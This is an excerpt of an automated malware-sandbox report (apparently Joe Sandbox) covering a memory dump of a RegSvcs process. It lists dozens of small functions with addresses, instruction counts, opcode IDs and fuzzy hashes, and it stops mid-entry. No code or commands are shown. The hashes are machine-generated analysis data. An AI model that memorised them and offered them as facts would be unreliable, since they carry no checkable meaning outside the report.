                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                        • Instruction ID: 930f54c2a66d26ae36a9dc6771e094602c0d9e0d0a97ed9938cba09b0e72e7af
                                                        • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                        • Instruction Fuzzy Hash: F9F0E972610204AFE714DF25CC01F56B7EAEF98354F258078A945D72A4FBB0ED01C654
                                                        Function 016AC912 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6c55dc9dfb0cee85491d0cce66333e7be753ecfa805c1dd8c35105e1f38a0a1e
                                                        • Instruction ID: 9e82741e926c5b5e3a7a776cbd6394de223318bfe4b10f575769edde95eb3222
                                                        • Opcode Fuzzy Hash: 6c55dc9dfb0cee85491d0cce66333e7be753ecfa805c1dd8c35105e1f38a0a1e
                                                        • Instruction Fuzzy Hash: 22F0C270A0020DDFCB04EF69C915A9EB7B4FF18300F008059B805EB385DA38EE01CB54
                                                        Function 016247FB Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10607765637c9d97cc29ff9bade75362de4e7cfeb0277b38819b64ecf0f38de9
                                                        • Instruction ID: 698eb4e9b96ebea5e116dea2cd2ecbcfb0a2e103f1834c7b882b442aadcf041e
                                                        • Opcode Fuzzy Hash: 10607765637c9d97cc29ff9bade75362de4e7cfeb0277b38819b64ecf0f38de9
                                                        • Instruction Fuzzy Hash: 8CF09031926EF19FE7228B5CCC44BA27FD89B01660F0B496AD94987602CFACD880CE51
                                                        Function 016E0115 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d0853933235363aa4882fc5045dac283a1b9a6c254dd8f8b343dbe0ade3859d9
                                                        • Instruction ID: 733e76ff19b44fb3b552ea1d2825c751e581446df354bc337266fc74e18b66d8
                                                        • Opcode Fuzzy Hash: d0853933235363aa4882fc5045dac283a1b9a6c254dd8f8b343dbe0ade3859d9
                                                        • Instruction Fuzzy Hash: 3FF0A76691B68117CF326B6CBC583D17BA7A752124F1A558DF4A15F345C6F4C483C324
                                                        Function 0165C5ED Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe34a2d478a1b269358a82b2853a6bf2f82624378efba4d5c655dc63fcbdcb50
                                                        • Instruction ID: 3cef6cb224e71676a9bfc13c87ffde5e85c3ff35f414d4fcf3d020b049196738
                                                        • Opcode Fuzzy Hash: fe34a2d478a1b269358a82b2853a6bf2f82624378efba4d5c655dc63fcbdcb50
                                                        • Instruction Fuzzy Hash: 15F0E2755117719FE3A29B1CCD48B517BDCAB41BA0F099429DD0687612C764EA81CA70
                                                        Function 01662619 Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                        • Instruction ID: 3f7da2704c4d5ae72b1de4b6da9bd4ffd69d3465c20ca1d29d910295a66e2a90
                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                        • Instruction Fuzzy Hash: 55E0D8323006012BE7119E598CD0F47776FDFD2B10F04007DB9049F252CAE2DC0983A8
                                                        Function 016B6030 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                        • Instruction ID: d3e96b3e705f63f017eb404f7e9c09676ab13511516762a83d44627e6159026f
                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                        • Instruction Fuzzy Hash: 28F06572104204DFE3218F0ADE84FA2B7F9EB55364F45C029E6099B661D379EC80CFA4
                                                        Function 01620710 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                        • Instruction ID: 881ccaf08e2ef839d2d7ae0765ff0bc0409d21ba975088340e0d50e4e29326f6
                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                        • Instruction Fuzzy Hash: 16F0ED7A204B559BEB16CF19D840AE57BA9FB49360F000098F8428B301EB36E982CF94
                                                        Function 016549D0 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                        • Instruction ID: 4df9ede5390e65404249999bd9934e76976aee7c1311d28824b74e3eb5a32a5a
                                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                        • Instruction Fuzzy Hash: D7E0D832244145ABD3E15A598C00B6677A6DBD07A0F150469EE098B258FF70DCC1C7EC
                                                        Function 016F4164 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b288d3eeada1933846ac224ed66ffc5258121295757d7229f2d69c600c49e9a
                                                        • Instruction ID: 9718024d68a3209152209cb850f9be65aa120c71c8e2ab033a4b42ecbcbe924f
                                                        • Opcode Fuzzy Hash: 8b288d3eeada1933846ac224ed66ffc5258121295757d7229f2d69c600c49e9a
                                                        • Instruction Fuzzy Hash: 99F02B31A259918FE772D72CDE80F6377E0AF10631F0A055CD5008BF16CB24DC40C650
                                                        Function 016C678E Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                        • Instruction ID: 4fe90ff62436bd33af92e3c0a0d88881b458894c8ab1e8b9e4ad46055dfb9a7f
                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                        • Instruction Fuzzy Hash: 51E0DF32A00110BBDB21A799CD01FAABEADDF90EA0F050098BA02E7290E530DE00C6A4
                                                        Function 016F08C0 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                        • Instruction ID: c22609b2e536bf243d7121ebd321e2a53714abf83469fcd2a372b1cf1c150a16
                                                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                        • Instruction Fuzzy Hash: 79E09B316403508BCF258A1DC941A53B7EEDF95661F16806DEA1547713C331F843C6D0
                                                        Function 016225E0 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f268014f5b36dd47205359f7be8fc84b7b9aa6172b175031e908054a826666ec
                                                        • Instruction ID: ac89d9ff6d4360a035e89b91db0c607bc7769fc531e1fbe000be121a3dbb5944
                                                        • Opcode Fuzzy Hash: f268014f5b36dd47205359f7be8fc84b7b9aa6172b175031e908054a826666ec
                                                        • Instruction Fuzzy Hash: DFE092721009649BC321BB2ADD11F8A779BEBA0364F01451DF11557190CB34A810CB88
                                                        Function 016DA456 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                        • Instruction ID: 11075065e1952e5a71b727dee611c90a3d2445752fccacb43a72d6b9d5f571e0
                                                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                        • Instruction Fuzzy Hash: 9EE09231411611DFE7326F6ACC48B527BE6FF90711F148C2CA096026B0C77598C0CA84
                                                        Function 016A4000 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                        • Instruction ID: 3e54f2af64bcba3538ff31bcdac1f988267824f8cb2536bf98f42b7b8837fced
                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                        • Instruction Fuzzy Hash: C9E0C2343403058FE715CF19C840B627BB6BFD5A10F68C068A9488F305EB72E842DB50
                                                        Function 0165CA38 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 32e6c360de6b8f9f6226271e6501f8c22bf10e250ad6ee5f4e99511991abbe8f
                                                        • Instruction ID: 1a0580ef3ef2e139f4e1af32d1e53bab0d7539e59d598f1dc568c1d2eaf02ede
                                                        • Opcode Fuzzy Hash: 32e6c360de6b8f9f6226271e6501f8c22bf10e250ad6ee5f4e99511991abbe8f
                                                        • Instruction Fuzzy Hash: A7D02B328851306ACFB5E11C7C04FD33E5E9B40320F018870FE0893011D554CC8282D8
                                                        Function 0161823B Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                        • Instruction ID: 8bd124ecb3fd4c40624c7c9645de8e39823c2930c51d04a079230b39bd17d2d5
                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                        • Instruction Fuzzy Hash: 2AE0C231000A10EFDB332F16DC10F9176AAFF94B10F24882DE081171A887B4AC82CB88
                                                        Function 01622050 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1dc954f8d7f76370de5ca63e9d7873f68480679358ddafcd3c04e67fab172053
                                                        • Instruction ID: 5be32a6d9f4c4cd01f49a0650df9767827579cad59d1330ae1e4a356a68a6b4d
                                                        • Opcode Fuzzy Hash: 1dc954f8d7f76370de5ca63e9d7873f68480679358ddafcd3c04e67fab172053
                                                        • Instruction Fuzzy Hash: BCE0C2332018606BC321FB5DDD10F4A739FEFA4370F014229F15187690CA64AC00CB98
                                                        Function 01676AA4 Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                        • Instruction ID: 71672e3dd4ff03d6310fdac111b6c7eaa09e0f07bb39de863a608dd33b25b281
                                                        • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                        • Instruction Fuzzy Hash: 95D05E36511A50AFD3329F1BEE00C13BBF9FBC4A10705062EA54683A20C770AC06CBA0
                                                        Function 0165E59C Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                        • Instruction ID: 6b39d9ed5fece23d79bc538b520984440872c2af2e3942d0866b4facff303685
                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                        • Instruction Fuzzy Hash: C8D0A932214620ABDB32AA1CFC00FC333E9BB88720F06049DB008C7250C364AC81CA88
                                                        Function 0169E908 Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                        • Instruction ID: 261ca165073b70a64b38ccfc00219d2c4e8ec5d45258915e882e66f3dc6c8076
                                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                        • Instruction Fuzzy Hash: 65E0EC359506849BDF12DF59CA40F5ABBB9BB94B40F150058E1485B760C729A901CB40
                                                        Function 0161A0E3 Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                        • Instruction ID: 789f5f1680e15a080f92ed7b80784af8b162c92997de546153101606f2931d68
                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                        • Instruction Fuzzy Hash: 00D022322130B093CB2856956D00F636906ABC0A95F0E002C340AD3A04C1088C43C2E0
                                                        Function 0165A830 Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                        • Instruction ID: b74b561ed14007ae4850f22878b33bac0c054c025650e2c380f219e9374e2e5b
                                                        • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                        • Instruction Fuzzy Hash: F8D012371D054DBBCB119F66DC01F957BA9E7A4BA0F444020B504875A0C63AE950D584
                                                        Function 0165CA24 Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8402c59f4b9b08bf17d47a4cee71184ed920c68a131fac3b0b09881a8816bcd9
                                                        • Instruction ID: a404c57320229bc4e9c0831339156d6dda36f20859e8805bed6b6b2b1de2793f
                                                        • Opcode Fuzzy Hash: 8402c59f4b9b08bf17d47a4cee71184ed920c68a131fac3b0b09881a8816bcd9
                                                        • Instruction Fuzzy Hash: 90D092356566069BDF6ADB59CE10A6A7ABDEF64B41F4000ACEA0192620E329E8128A50
                                                        Function 016302A0 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                        • Instruction ID: 60e1f7bb0ddddfb67f89f237bdc3a8b8a894f14d7ec525b15cdb0958f99f622a
                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                        • Instruction Fuzzy Hash: 15D0C935212E80CFD61BCB0CC9A4F1533A8FB84B44F814490F501CBB22DB6CD944CA00
                                                        Function 0165C700 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                        • Instruction ID: 8d1713207b9afe39a1118f65207fb4f56a429ccc5e1fe7d6ad05e7a799aab82a
                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                        • Instruction Fuzzy Hash: F4C01232290648AFC712AA99CD01F027BAAEBA8B40F000021F2048B670C635E820EA88
                                                        Function 01640310 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                        • Instruction ID: f6e9bdd7ba10a689ab23bf0b4f23373d93f1822ed7c6bc090a5f03c042bd1fc5
                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                        • Instruction Fuzzy Hash: 75D01236100249EFCB02DF41C890D9A7B2BFBD8710F108019FD19076108A31ED62DA50
                                                        Function 01620750 Relevance: .0, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                        • Instruction ID: 4ad718402088b07d1c68c5da17df28208e58b7615997ce46ff154a33ffa90369
                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                        • Instruction Fuzzy Hash: E6C04C797015418FCF15DB19D794F4577E4F754750F1518D0E805CB721E724E805CA10
                                                        Function 01664340 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e172c4c438b62026560107f1a6eac222164adcec0cd607ffd011448312a46f51
                                                        • Instruction ID: f7f97deef94f908ec4ae79470bc2e782c74a5bc3a3690f3ad69399aa2a9c5aac
                                                        • Opcode Fuzzy Hash: e172c4c438b62026560107f1a6eac222164adcec0cd607ffd011448312a46f51
                                                        • Instruction Fuzzy Hash: E790023160580012914075584C885474009A7E0301B55C121E4424654DCA148E565361
                                                        Function 01664650 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af830110bb7be53304a420d388521d7c1bdf41d7c9871420fec7eff7d7515d0c
                                                        • Instruction ID: 8fa1b03d2af62e782b7278729e8f26cf32a47cc7f17137c5ce48a0972b1b01d2
                                                        • Opcode Fuzzy Hash: af830110bb7be53304a420d388521d7c1bdf41d7c9871420fec7eff7d7515d0c
                                                        • Instruction Fuzzy Hash: 7790026160150042414075584C084076009A7E1301395C225A4554660DC6188D559369
                                                        Function 01662BE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc452bf3455871ee68dc3655075af0b004f7b57898154ac9c104b2b6e22eb915
                                                        • Instruction ID: 3238d8adecb2e293899483f2b882ebbdbe8c29a1b04ed87c5a509cb3dfe011c5
                                                        • Opcode Fuzzy Hash: cc452bf3455871ee68dc3655075af0b004f7b57898154ac9c104b2b6e22eb915
                                                        • Instruction Fuzzy Hash: AF90023120544842D14075584808A47001997D0305F55C121A4064794ED6258E55B761
                                                        Function 01662BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 69a36abefe46d9a1aa9cd6432f09e5cc93e9e2ff33ae8a20f84b353b267e25f5
                                                        • Instruction ID: c6849e1bfd3c8cf7815ecd82bb5a9ea22b1dd29454d0924a70bef014fda25150
                                                        • Opcode Fuzzy Hash: 69a36abefe46d9a1aa9cd6432f09e5cc93e9e2ff33ae8a20f84b353b267e25f5
                                                        • Instruction Fuzzy Hash: 1490023120140802D1807558480864B000997D1301F95C125A4025754ECA158F5977A1
                                                        Function 01662BA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
